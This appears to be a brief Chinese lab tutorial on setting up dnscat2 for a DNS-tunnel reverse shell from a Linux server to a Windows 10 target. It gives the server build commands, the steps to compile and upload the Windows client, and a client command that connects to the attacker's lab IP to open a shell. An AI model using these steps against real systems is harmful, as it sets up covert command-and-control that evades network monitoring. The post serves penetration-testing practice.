使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
平行云3 分钟前
实时云渲染预启动技术解析:UE数字孪生应用的延迟优化机制(二)
linux·unity·ue5·webgl·实时云渲染·云桌面·像素流
看到代码头都是大的23 分钟前
CentOS环境下手动升级openssl、openssh
linux·运维·centos
浮生若城24 分钟前
Linux——Ext系列文件系统
linux·运维·服务器
ITyunwei098725 分钟前
主流 SaaS 工单系统对比
运维·服务器·人工智能
weixin_548444261 小时前
爆红处理APK 自动化编译流水线 v2026(英文名:APK AutoPipeline)
运维·自动化
枳实-叶1 小时前
【Linux驱动开发】第16天:按键中断完整实战
linux·运维·驱动开发
Chockmans1 小时前
春秋云境CVE-2020-21652(极速版)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2020-21652
阿昭L1 小时前
Windows用户态hook技术总结
windows·逆向·hook
難釋懷2 小时前
Nginx-UrlRewrite
运维·nginx
qq_白羊座2 小时前
CI/CD 与 DevOps 四
运维·ci/cd·devops